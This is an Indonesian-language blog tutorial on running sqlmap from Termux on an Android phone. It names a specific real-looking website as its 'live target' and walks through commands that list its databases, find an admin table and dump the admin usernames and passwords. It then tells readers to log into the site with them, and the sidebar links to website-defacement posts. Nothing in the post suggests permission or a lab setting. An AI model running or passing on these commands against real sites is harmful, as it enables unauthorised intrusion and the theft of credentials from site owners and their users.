Cara Menjalankan Sql injection Ditermux

Ok balik lagi yah melanjut tutorial kemarin yg menjelaskan cara menjalankan sql injection dihp android 😁


Jadi untuk Bahan-bahannya :
- Hp yg sudah terinstall termux, baca juga Cara Menginstall Sql injection ditermux
- Drok Sql Klik Disini Ada Banyak

Pengertian Sedikit Tentang Sql injection :
-u = url
--dbs = database
--tables (-T) = table database
--columns (-C) = kolom pada tabel

--dump = pengakhiran session

Pertama harus kita cari database -> table database -> kolom table data base -> dump

Live Target : 
http://www.aec.com.mm/news.php?nid=291

Ok langsung saja yah, gw lanjutkan tutorial kmarin saja, sampai disini yah, yg belum bisa liat Cara mengintall sql injection ditermux


Tutorialnya :
1. python2 sqlmap.py -u (target) --dbs
Berarti
python2 sqlmap.py -u http://www.aec.com.mm/news.php?nid=291 --dbs



Karna kita sudah menemukan informasi data base, berarti tinggal kita ambil saja, data base diatas

2. python2 sqlmap.py -u (target) -D (database) --tables
Berarti
python2 sqlmap.py -u http://www.aec.com.mm/news.php?nid=291 -D aecadm_aec --tables


Nah disini sudah ketemu table adminnya
Berarti tinggal kita cari tahu lagi dalam table tersebut

3. python2 sqlmap.py -u (target) -D (database) -T (NamaTable) --columns
Berarti
python2 sqlmap.py -u http://www.aec.com.mm/news.php?nid=291 -D aecadm_aec -T admin --columns


Oke akhirnya dapet data dalam admin dari columns admin tersebut, keterangan username sama password ada 32 varchar, emm inget ini varchar bukan pacar 😑
Mentang" jomblo nyari pacar sembarangan 😂
Selanjutnya tinggal kita cari saja username dan passwordnya, untuk masuk kedalam system websitenya

4. python2 sqlmap.py -u (target) -D (database) -T (NamaTable) -C (namadatacolumn) --dbs
karna kita mencari data username sama password berarti tinggal kita ketik
python2 sqlmap.py -u http://www.aec.com.mm/news.php?nid=291 -D aecadm_aec -T admin -C username,password --dump


Nahh kan dapet Pacarnya 😂
Ehh mksudnya varchar username sama data adminnya 😂

Tinggal kita masuk dah kedalam websitenya, kalo sudah masuk terserah dah mau diapain juga, asal yg baik" yah 😁
Oke sekian and trimakasih...

Comments

Post a Comment

Popular posts from this blog

Deface Bypass Admin Terbaru 2018

Deface Webdav With Apk Exploiter